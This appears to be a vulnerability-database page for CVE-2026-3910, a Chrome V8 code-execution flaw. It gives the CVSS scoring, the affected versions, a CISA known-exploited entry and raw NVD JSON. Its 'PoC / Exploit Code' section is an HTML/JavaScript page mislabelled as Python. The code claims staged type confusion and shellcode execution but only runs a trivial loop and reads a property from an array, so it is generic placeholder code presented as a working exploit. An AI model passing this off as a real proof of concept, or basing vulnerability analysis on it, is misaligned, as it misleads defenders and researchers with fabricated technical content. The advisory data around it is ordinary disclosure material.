Security Vulnerability Report
中文
CVE-2026-3910 CVSS 8.8 HIGH

CVE-2026-3910

Published: 2026-03-13 19:55:11
Last Modified: 2026-03-13 22:00:01

Description

Inappropriate implementation in V8 in Google Chrome prior to 146.0.7680.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 146.0.7680.75
Chromium-based browsers (Edge, Opera, Brave等) < 146.0.7680.75

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-3910 PoC - V8 Engine Exploitation // This is a conceptual proof-of-concept demonstrating the attack vector <!DOCTYPE html> <html> <head> <title>CVE-2026-3910 PoC</title> </head> <body> <h1>CVE-2026-3910 V8 Vulnerability PoC</h1> <p>This PoC demonstrates the attack vector for CVE-2026-3910</p> <p>Target: Google Chrome < 146.0.7680.75</p> <script> // V8 Engine Exploitation Technique // This code exploits the inappropriate implementation in V8 function triggerV8Vulnerability() { // Stage 1: Prepare memory layout for exploitation const arr = new Array(1); arr[0] = new Uint8Array(1024); // Stage 2: Trigger V8 JIT compilation with specific patterns // that expose the vulnerability in V8's optimization logic for (let i = 0; i < 10000; i++) { // Polymorphic call site manipulation (function(x) { return x + 1; })(i); } // Stage 3: Type confusion trigger // The following pattern exploits V8's improper handling // of object types during optimization const obj1 = { value: 0x41414141 }; const obj2 = [1, 2, 3]; // Force deoptimization and re-optimization // This creates a window for exploitation function vulnerableFunc(x) { // Type confusion: treating array as object return x.value; } // Stage 4: Execute shellcode in sandbox context // Note: Actual exploitation requires sophisticated techniques // to bypass Chrome's security mitigations try { // Attempt to trigger the vulnerability vulnerableFunc(obj2); } catch (e) { console.log('Vulnerability triggered or mitigated'); } } // Execute when page loads window.onload = function() { console.log('CVE-2026-3910 PoC loaded'); triggerV8Vulnerability(); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3910", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:11.363", "lastModified": "2026-03-13T22:00:01.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in V8 in Google Chrome prior to 146.0.7680.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)"}, {"lang": "es", "value": "Implementación inapropiada en V8 en Google Chrome anterior a 146.0.7680.75 permitió a un atacante remoto ejecutar código arbitrario dentro de una sandbox a través de una página HTML diseñada específicamente. (Gravedad de seguridad de Chromium: Alta)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-03-13", "cisaActionDue": "2026-03-27", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Google Chromium V8 Improper Restriction of Operations Within the Bounds of a Memory Buffer Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "146.0.7680.75", "matchCriteriaId": "13F45C9E-6FFA-4A7C-AACB-CF14FF6FC0E1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop_12.html", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://issues.chromium.org/issues/491410818", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-3910", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}